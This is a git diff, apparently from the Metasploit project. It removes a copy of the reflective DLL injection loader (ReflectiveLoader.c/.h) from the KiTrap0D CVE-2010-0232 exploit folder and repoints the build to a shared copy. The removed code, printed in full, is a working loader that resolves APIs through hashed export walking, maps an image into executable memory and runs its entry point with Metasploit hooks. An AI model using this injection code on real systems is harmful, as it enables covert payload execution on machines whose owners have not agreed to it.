-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 3;
-#ifdef ENABLE_STOPPAGING
-			usCounter++;
-#endif
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-			usCounter++;
-#endif
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == LOADLIBRARYA_HASH
-					|| dwHashValue == GETPROCADDRESS_HASH
-					|| dwHashValue == VIRTUALALLOC_HASH
-#ifdef ENABLE_STOPPAGING
-					|| dwHashValue == VIRTUALLOCK_HASH
-#endif
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-					|| dwHashValue == OUTPUTDEBUG_HASH
-#endif
-					)
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == LOADLIBRARYA_HASH )
-						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == GETPROCADDRESS_HASH )
-						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-					else if( dwHashValue == VIRTUALALLOC_HASH )
-						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-#ifdef ENABLE_STOPPAGING
-					else if( dwHashValue == VIRTUALLOCK_HASH )
-						pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-#endif
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-					else if( dwHashValue == OUTPUTDEBUG_HASH )
-						pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-#endif
-			
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
-			// get the VA of the modules NT Header
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-			// uiNameArray = the address of the modules export directory entry
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-			// get the VA of the export directory
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-			// get the VA for the array of name pointers
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-			
-			// get the VA for the array of name ordinals
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
-			usCounter = 1;
-
-			// loop while we still have imports to find
-			while( usCounter > 0 )
-			{
-				// compute the hash values for this function name
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
-				
-				// if we have found a function we want we get its virtual address
-				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-				{
-					// get the VA for the array of addresses
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-					// use this functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-					// store this functions VA
-					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
-						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
-					// decrement our counter
-					usCounter--;
-				}
-
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-
-		// we stop searching when we have found everything we need.
-		if( pLoadLibraryA
-			&& pGetProcAddress
-			&& pVirtualAlloc
-#ifdef ENABLE_STOPPAGING
-			&& pVirtualLock
-#endif
-			&& pNtFlushInstructionCache
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-			&& pOutputDebug
-#endif
-			)
-			break;
-
-		// get the next entry
-		uiValueA = DEREF( uiValueA );
-	}
-
-	// STEP 2: load our image into a new permanent location in memory...
-
-	// get the VA of the NT Header for the PE to be loaded
-	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
-	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
-	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
-#ifdef ENABLE_STOPPAGING
-	// prevent our image from being swapped to the pagefile
-	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
-#endif
-
-	// we must now copy over the headers
-	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
-	uiValueB = uiLibraryAddress;
-	uiValueC = uiBaseAddress;
-
-	while( uiValueA-- )
-		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
-
-	// STEP 3: load in all of our sections...
-
-	// uiValueA = the VA of the first section
-	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-	
-	// itterate through all sections, loading them into memory.
-	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
-	while( uiValueE-- )
-	{
-		// uiValueB is the VA for this section
-		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
-		// uiValueC if the VA for this sections data
-		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
-		// copy the section over
-		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
-
-		while( uiValueD-- )
-			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
-
-		// get the VA of the next section
-		uiValueA += sizeof( IMAGE_SECTION_HEADER );
-	}
-
-	// STEP 4: process our images import table...
-
-	// uiValueB = the address of the import directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-	
-	// we assume there is an import table to process
-	// uiValueC is the first entry in the import table
-	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-	
-	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
-	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
-	{
-		OUTPUTDBG("Loading library: ");
-		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
-		OUTPUTDBG("\n");
-
-		// use LoadLibraryA to load the imported module into memory
-		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
-		if ( !uiLibraryAddress )
-		{
-			OUTPUTDBG("Loading library FAILED\n");
-
-			uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
-			continue;
-		}
-
-		// uiValueD = VA of the OriginalFirstThunk
-		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-	
-		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
-		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
-		// itterate through all imported functions, importing by ordinal if no name present
-		while( DEREF(uiValueA) )
-		{
-			// sanity check uiValueD as some compilers only import by FirstThunk
-			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
-			{
-				// get the VA of the modules NT Header
-				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-				// uiNameArray = the address of the modules export directory entry
-				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-				// get the VA of the export directory
-				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-				// get the VA for the array of addresses
-				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-				// use the import ordinal (- export ordinal base) as an index into the array of addresses
-				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
-				// patch in the address for this imported function
-				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
-			}
-			else
-			{
-				// get the VA of this functions import by name struct
-				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
-				OUTPUTDBG("Resolving function: ");
-				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
-				OUTPUTDBG("\n");
-
-				// use GetProcAddress and patch in the address for this imported function
-				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
-			}
-			// get the next imported function
-			uiValueA += sizeof( ULONG_PTR );
-			if( uiValueD )
-				uiValueD += sizeof( ULONG_PTR );
-		}
-
-		// get the next import
-		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
-	}
-
-	// STEP 5: process all of our images relocations...
-
-	// calculate the base address delta and perform relocations (even if we load at desired image base)
-	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
-	// uiValueB = the address of the relocation directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
-	// check if their are any relocations present
-	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
-	{
-		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
-		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
-		// and we itterate through all entries...
-		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
-		{
-			// uiValueA = the VA for this relocation block
-			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
-			// uiValueB = number of entries in this relocation block
-			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
-			// uiValueD is now the first entry in the current relocation block
-			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
-			// we itterate through all the entries in the current block...
-			while( uiValueB-- )
-			{
-				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
-				// we dont use a switch statement to avoid the compiler building a jump table
-				// which would not be very position independent!
-				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
-					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
-					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
-#ifdef WIN_ARM
-				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
-				{	
-					register DWORD dwInstruction;
-					register DWORD dwAddress;
-					register WORD wImm;
-					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
-					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
-					// flip the words to get the instruction as expected
-					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					// sanity chack we are processing a MOV instruction...
-					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
-					{
-						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
-						wImm  = (WORD)( dwInstruction & 0x000000FF);
-						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
-						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
-						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
-						// apply the relocation to the target address
-						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
-						// now create a new instruction with the same opcode and register param.
-						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
-						// patch in the relocated address...
-						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
-						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
-						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
-						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
-						// now flip the instructions words and patch back into the code...
-						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					}
-				}
-#endif
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
-				// get the next entry in the current relocation block
-				uiValueD += sizeof( IMAGE_RELOC );
-			}
-
-			// get the next entry in the relocation directory
-			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
-		}
-	}
-
-	// STEP 6: call our images entry point
-
-	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
-	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
-	OUTPUTDBG("Flushing the instruction cache");
-	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
-	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
-
-	// call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
-	// if we are injecting an DLL via a stub we call DllMain with no parameter
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
-	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
-	return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-// you must implement this function...
-extern DWORD DLLEXPORT Init( SOCKET socket );
-
-BOOL MetasploitDllAttach( SOCKET socket )
-{
-	Init( socket );
-	return TRUE;
-}
-
-BOOL MetasploitDllDetach( DWORD dwExitFunc )
-{
-	switch( dwExitFunc )
-	{
-		case EXITFUNC_SEH:
-			SetUnhandledExceptionFilter( NULL );
-			break;
-		case EXITFUNC_THREAD:
-			ExitThread( 0 );
-			break;
-		case EXITFUNC_PROCESS:
-			ExitProcess( 0 );
-			break;
-		default:
-			break;
-	}
-
-	return TRUE;
-}
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
-    BOOL bReturnValue = TRUE;
-
-	switch( dwReason ) 
-    { 
-		case DLL_METASPLOIT_ATTACH:
-			bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
-			break;
-		case DLL_METASPLOIT_DETACH:
-			bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
-			break;
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h
deleted file mode 100644
index 26c195b2fc..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h
+++ /dev/null
@@ -1,223 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-#include <Winsock2.h>
-#include <intrin.h>
-
-#include "ReflectiveDLLInjection.h"
-
-// Enable this define to turn on OutputDebugString support
-//#define ENABLE_OUTPUTDEBUGSTRING 1
-
-// Enable this define to turn on locking of memory to prevent paging
-#define ENABLE_STOPPAGING 1
-
-#define EXITFUNC_SEH		0xEA320EFE
-#define EXITFUNC_THREAD		0x0A2A1DE0
-#define EXITFUNC_PROCESS	0x56A2B5F0
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH				0x6A4ABC5B
-#define NTDLLDLL_HASH					0x3CFA685D
-
-#define LOADLIBRARYA_HASH				0xEC0E4E8E
-#define GETPROCADDRESS_HASH				0x7C0DFCAA
-#define VIRTUALALLOC_HASH				0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
-
-#ifdef ENABLE_STOPPAGING
-typedef LPVOID  (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
-#define VIRTUALLOCK_HASH				0x0EF632F2
-#endif
-
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-typedef LPVOID  (WINAPI * OUTPUTDEBUG)( LPCSTR );
-#define OUTPUTDEBUG_HASH				0x470D22BC
-#endif
-
-#define IMAGE_REL_BASED_ARM_MOV32A		5
-#define IMAGE_REL_BASED_ARM_MOV32T		7
-
-#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
-#define ARM_MOVW						0xF2400000
-#define ARM_MOVT						0xF2C00000
-
-#define HASH_KEY						13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
-	return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD _hash( char * c )
-{
-    register DWORD h = 0;
-	do
-	{
-		h = ror( h );
-        h += *c;
-	} while( *++c );
-
-    return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
-  USHORT Length;
-  USHORT MaximumLength;
-  PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) ) 
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
-	LIST_ENTRY InMemoryOrderModuleList;
-	LIST_ENTRY InInitializationOrderModuleList;
-	PVOID DllBase;
-	PVOID EntryPoint;
-	ULONG SizeOfImage;
-	UNICODE_STR FullDllName;
-	UNICODE_STR BaseDllName;
-	ULONG Flags;
-	SHORT LoadCount;
-	SHORT TlsIndex;
-	LIST_ENTRY HashTableEntry;
-	ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
-   DWORD dwLength;
-   DWORD dwInitialized;
-   LPVOID lpSsHandle;
-   LIST_ENTRY InLoadOrderModuleList;
-   LIST_ENTRY InMemoryOrderModuleList;
-   LIST_ENTRY InInitializationOrderModuleList;
-   LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
-   struct _PEB_FREE_BLOCK * pNext;
-   DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
-   BYTE bInheritedAddressSpace;
-   BYTE bReadImageFileExecOptions;
-   BYTE bBeingDebugged;
-   BYTE bSpareBool;
-   LPVOID lpMutant;
-   LPVOID lpImageBaseAddress;
-   PPEB_LDR_DATA pLdr;
-   LPVOID lpProcessParameters;
-   LPVOID lpSubSystemData;
-   LPVOID lpProcessHeap;
-   PRTL_CRITICAL_SECTION pFastPebLock;
-   LPVOID lpFastPebLockRoutine;
-   LPVOID lpFastPebUnlockRoutine;
-   DWORD dwEnvironmentUpdateCount;
-   LPVOID lpKernelCallbackTable;
-   DWORD dwSystemReserved;
-   DWORD dwAtlThunkSListPtr32;
-   PPEB_FREE_BLOCK pFreeList;
-   DWORD dwTlsExpansionCounter;
-   LPVOID lpTlsBitmap;
-   DWORD dwTlsBitmapBits[2];
-   LPVOID lpReadOnlySharedMemoryBase;
-   LPVOID lpReadOnlySharedMemoryHeap;
-   LPVOID lpReadOnlyStaticServerData;
-   LPVOID lpAnsiCodePageData;
-   LPVOID lpOemCodePageData;
-   LPVOID lpUnicodeCaseTableData;
-   DWORD dwNumberOfProcessors;
-   DWORD dwNtGlobalFlag;
-   LARGE_INTEGER liCriticalSectionTimeout;
-   DWORD dwHeapSegmentReserve;
-   DWORD dwHeapSegmentCommit;
-   DWORD dwHeapDeCommitTotalFreeThreshold;
-   DWORD dwHeapDeCommitFreeBlockThreshold;
-   DWORD dwNumberOfHeaps;
-   DWORD dwMaximumNumberOfHeaps;
-   LPVOID lpProcessHeaps;
-   LPVOID lpGdiSharedHandleTable;
-   LPVOID lpProcessStarterHelper;
-   DWORD dwGdiDCAttributeList;
-   LPVOID lpLoaderLock;
-   DWORD dwOSMajorVersion;
-   DWORD dwOSMinorVersion;
-   WORD wOSBuildNumber;
-   WORD wOSCSDVersion;
-   DWORD dwOSPlatformId;
-   DWORD dwImageSubsystem;
-   DWORD dwImageSubsystemMajorVersion;
-   DWORD dwImageSubsystemMinorVersion;
-   DWORD dwImageProcessAffinityMask;
-   DWORD dwGdiHandleBuffer[34];
-   LPVOID lpPostProcessInitRoutine;
-   LPVOID lpTlsExpansionBitmap;
-   DWORD dwTlsExpansionBitmapBits[32];
-   DWORD dwSessionId;
-   ULARGE_INTEGER liAppCompatFlags;
-   ULARGE_INTEGER liAppCompatFlagsUser;
-   LPVOID lppShimData;
-   LPVOID lpAppCompatInfo;
-   UNICODE_STR usCSDVersion;
-   LPVOID lpActivationContextData;
-   LPVOID lpProcessAssemblyStorageMap;
-   LPVOID lpSystemDefaultActivationContextData;
-   LPVOID lpSystemAssemblyStorageMap;
-   DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
-	WORD	offset:12;
-	WORD	type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c
index 0e1600ee74..de50313c19 100755
--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c
@@ -10,11 +10,11 @@
  */
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "../common/ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 #include <stdio.h>
 #include "../common/common.h"
-#include "../common/LoadLibraryR.h"
+#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
 #include "../common/ResourceLoader.h"
 #include "resource.h"
 
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
index 8b82cd553c..8bc56a0824 100644
--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
@@ -49,7 +49,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -81,7 +81,7 @@
       <Optimization>MinSpace</Optimization>
